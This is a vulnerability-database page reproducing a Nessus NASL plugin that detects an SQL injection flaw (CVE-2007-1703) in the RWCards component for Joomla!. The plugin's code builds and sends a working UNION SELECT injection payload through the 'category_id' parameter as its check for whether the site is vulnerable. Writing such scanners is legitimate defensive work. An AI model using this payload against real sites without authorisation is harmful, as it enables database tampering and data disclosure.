Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2007-2024 and is owned by Tenable, Inc. or an Affiliate thereof.JOOMLA_RWCARDS_CATEGORY_ID_SQL_INJECTION.NASL
HistoryMar 27, 2007 - 12:00 a.m.

RWCards Component for Joomla! 'category_id' Parameter SQLi

2007-03-2700:00:00
This script is Copyright (C) 2007-2024 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
33

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.5 High

AI Score

Confidence

Low

0.149 Low

EPSS

Percentile

95.8%

JSON

The version of the RWCards component for Joomla! running on the remote host is affected by a SQL injection vulnerability in rwcards.php due to improper sanitization of user-supplied input to the ‘category_id’ parameter before using it to construct database queries. Provided the PHP ‘magic_quotes_gpc’ setting is disabled, an unauthenticated, remote attacker can exploit this issue to manipulate database queries, resulting in disclosure of sensitive information, modification of data, or other attacks against the underlying database.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(24899);
  script_version("1.26");
  script_set_attribute(attribute:"plugin_modification_date", value:"2024/06/05");

  script_cve_id("CVE-2007-1703");
  script_bugtraq_id(23126);

  script_name(english:"RWCards Component for Joomla! 'category_id' Parameter SQLi");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that is affected by a
SQL injection vulnerability.");
  script_set_attribute(attribute:"description", value:
"The version of the RWCards component for Joomla! running on the remote
host is affected by a SQL injection vulnerability in rwcards.php due
to improper sanitization of user-supplied input to the 'category_id'
parameter before using it to construct database queries. Provided the
PHP 'magic_quotes_gpc' setting is disabled, an unauthenticated, remote
attacker can exploit this issue to manipulate database queries,
resulting in disclosure of sensitive information, modification of
data, or other attacks against the underlying database.");
  script_set_attribute(attribute:"solution", value:
"Unknown at this time.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:U/RC:ND");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2007/03/24");
  script_set_attribute(attribute:"plugin_publication_date", value:"2007/03/27");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:joomla:joomla\!");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_set_attribute(attribute:"enable_cgi_scanning", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2024 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("joomla_detect.nasl");
  script_require_keys("installed_sw/Joomla!", "www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");

app = "Joomla!";
get_install_count(app_name:app, exit_if_zero:TRUE);

port = get_http_port(default:80, php:TRUE);

install = get_single_install(
  app_name : app,
  port     : port
);
dir = install['path'];
install_url =  build_url(port:port, qs:dir);

# Verify component is installed
plugin = "RWCards";

# Check KB first
installed = get_kb_item("www/"+port+"/webapp_ext/"+plugin+" under "+dir);

if (!installed)
{
  checks = make_array();
  regexes = make_list();
  regexes[0] = make_list('.rwcardsfull', '.rwcards');
  checks["/components/com_rwcards/css/rwcards.css"] = regexes;
  checks["/components/com_rwcards/css/rwcards.filloutform.css"] = regexes;

  # Ensure plugin is installed
  installed = check_webapp_ext(
    checks : checks,
    dir    : dir,
    port   : port,
    ext    : plugin
  );
}
if (!installed) audit(AUDIT_WEB_APP_EXT_NOT_INST, app, install_url, plugin + " component");

# Try to exploit the flaw to manipulate the title in a list of "cards".
magic = SCRIPT_NAME - ".nasl" + "-" + rand();
enc_magic = "char(";
for (i=0; i<strlen(magic)-1; i++)
  enc_magic += ord(magic[i]) + ",";
enc_magic += ord(magic[i]) + ")";
exploit = "-1' UNION SELECT 1,2,03,4," +enc_magic+ ",50,044,076,0678,07--";

url = "/index.php?option=com_rwcards&task=listCards&category_id="+ urlencode(str:exploit);

w = http_send_recv3(
  method : "GET",
  item   : dir + url,
  port   : port,
  exit_on_fail : TRUE
);
res = w[2];

# There's a problem if we managed to set the title based on our magic.
if ('>Title: </td><td  class="contentdescription">' +magic+ "</td>" >< res)
{
  output = strstr(res, '>Title: </td>');
  if (empty_or_null(output)) output = res;

  security_report_v4(
    port        : port,
    severity    : SECURITY_WARNING,
    sqli        : TRUE,
    generic     : TRUE,
    request     : make_list(install_url+url),
    output      : chomp(output)
  );
  exit(0);
}
else
  audit(AUDIT_WEB_APP_EXT_NOT_AFFECTED, app, install_url, plugin + " component");
VendorProductVersionCPE
joomlajoomla%5c%21cpe:/a:joomla:joomla%5c%21

Related

nvd 1
cve 1
cvelist 1
prion 1
securityvulns 1
nvd
nvd
CVE-2007-1703
2007-03-27 01:19:00
cve
cve
CVE-2007-1703
2007-03-27 01:19:00
cvelist
cvelist
CVE-2007-1703
2007-03-27 01:00:00
prion
prion
Sql injection
2007-03-27 01:19:00
securityvulns
securityvulns
Daily web applications security vulnerabilities summary &#40;PHP, ASP, JSP, CGI, Perl&#41;
2007-03-25 00:00:00

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.5 High

AI Score

Confidence

Low

0.149 Low

EPSS

Percentile

95.8%

JSON
Related for JOOMLA_RWCARDS_CATEGORY_ID_SQL_INJECTION.NASL
nvd1cve1cvelist1prion1securityvulns1